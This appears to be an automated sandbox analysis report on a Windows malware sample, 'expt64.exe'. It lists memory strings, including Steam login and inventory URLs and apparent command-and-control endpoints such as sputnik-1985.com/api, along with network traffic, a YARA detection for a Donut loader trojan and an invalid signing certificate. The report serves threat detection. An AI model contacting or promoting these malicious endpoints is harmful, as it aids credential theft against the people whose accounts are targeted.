Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: expt64.exe, 00000000.00000003.2490967946.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.stC
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: expt64.exe	String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steamp
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: expt64.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: expt64.exe, 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2516733335.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.000000000065A000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2580509230.0000000000685000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/
Source: expt64.exe, 00000000.00000002.2582315478.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.0000000000708000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2582372012.000000000070B000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2568391413.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2580979296.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2544998470.0000000000709000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api
Source: expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/api5;w
Source: expt64.exe, 00000000.00000003.2517025375.0000000000707000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.0000000000707000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apiing
Source: expt64.exe, 00000000.00000003.2544998470.0000000000709000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/apijOg
Source: expt64.exe, 00000000.00000003.2544998470.00000000006FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/h
Source: expt64.exe, 00000000.00000002.2582315478.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2583347735.00000000033EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sputnik-1985.com/t
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized#
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: expt64.exe, 00000000.00000003.2481180004.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2490967946.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481055500.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491031020.0000000000653000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491601171.00000000006F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wordyfindy.lat/apiM:
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: expt64.exe, 00000000.00000003.2503963189.0000000003379000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: expt64.exe, 00000000.00000003.2581042978.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptc
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: expt64.exe, 00000000.00000003.2532759529.000000000363C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: expt64.exe, 00000000.00000003.2532897165.000000000384E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: expt64.exe, 00000000.00000003.2481055500.00000000006E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.12:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49728 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Detected potential unwanted application

Source: expt64.exe

PE Siganture Subject Chain: CN="DivX, LLC", O="DivX, LLC", S=California, C=US, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=California, OID.1.3.6.1.4.1.311.60.2.1.3=US, SERIALNUMBER=201810310435

Source: C:\Users\user\Desktop\expt64.exe

Code function: 0_2_02342664 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect,CreateThread,

0_2_02342664

Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02342664	0_2_02342664
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F05AF	0_2_022F05AF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231E2FC	0_2_0231E2FC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022FC2DC	0_2_022FC2DC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230F32C	0_2_0230F32C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F531C	0_2_022F531C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232D36C	0_2_0232D36C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0233F36C	0_2_0233F36C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230B35C	0_2_0230B35C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F735C	0_2_022F735C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232938C	0_2_0232938C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023003DC	0_2_023003DC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F0000	0_2_022F0000
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02321005	0_2_02321005
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F806C	0_2_022F806C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232D07C	0_2_0232D07C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022FE04D	0_2_022FE04D
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231A056	0_2_0231A056
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232A0EC	0_2_0232A0EC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023030CC	0_2_023030CC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230D155	0_2_0230D155
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023311AC	0_2_023311AC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F660C	0_2_022F660C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023096A6	0_2_023096A6
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023026AF	0_2_023026AF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022FB69B	0_2_022FB69B
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231E689	0_2_0231E689
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232971C	0_2_0232971C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231D7A3	0_2_0231D7A3
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230C7FC	0_2_0230C7FC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230F7EC	0_2_0230F7EC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230749E	0_2_0230749E
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230E4F0	0_2_0230E4F0
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023174FB	0_2_023174FB
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0233153C	0_2_0233153C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02300567	0_2_02300567
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023305EC	0_2_023305EC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02323ADC	0_2_02323ADC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022FAB2C	0_2_022FAB2C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02330B7C	0_2_02330B7C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0233EB64	0_2_0233EB64
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02309B9C	0_2_02309B9C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02328B9C	0_2_02328B9C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232CBFC	0_2_0232CBFC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F7BDC	0_2_022F7BDC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F781C	0_2_022F781C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232387C	0_2_0232387C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231D867	0_2_0231D867
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232A86C	0_2_0232A86C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0232F845	0_2_0232F845
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231E88C	0_2_0231E88C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_023278FF	0_2_023278FF
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F48FC	0_2_022F48FC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231E2FC	0_2_0231E2FC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231D8C9	0_2_0231D8C9
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231F91D	0_2_0231F91D
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F8E3C	0_2_022F8E3C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0233FE0C	0_2_0233FE0C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02330E7C	0_2_02330E7C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0231CEB8	0_2_0231CEB8
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02321E9C	0_2_02321E9C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02307EC8	0_2_02307EC8
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0233EF34	0_2_0233EF34
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02300F55	0_2_02300F55
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02317F4C	0_2_02317F4C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02327F95	0_2_02327F95
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02312F9C	0_2_02312F9C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022FAF9C	0_2_022FAF9C
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02320C3D	0_2_02320C3D
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0233DC70	0_2_0233DC70
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02301C73	0_2_02301C73
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F9CEC	0_2_022F9CEC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_022F5CCC	0_2_022F5CCC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02302DB6	0_2_02302DB6
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_0230FDBC	0_2_0230FDBC
Source: C:\Users\user\Desktop\expt64.exe	Code function: 0_2_02328DFC	0_2_02328DFC

Source: C:\Users\user\Desktop\expt64.exe	Code function: String function: 023056FC appears 74 times
Source: C:\Users\user\Desktop\expt64.exe	Code function: String function: 022F99CC appears 75 times

Source: expt64.exe

Static PE information: invalid certificate

Source: expt64.exe, 00000000.00000000.2350832363.00000000004C6000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs expt64.exe
Source: expt64.exe	Binary or memory string: OriginalFileName vs expt64.exe

Source: expt64.exe

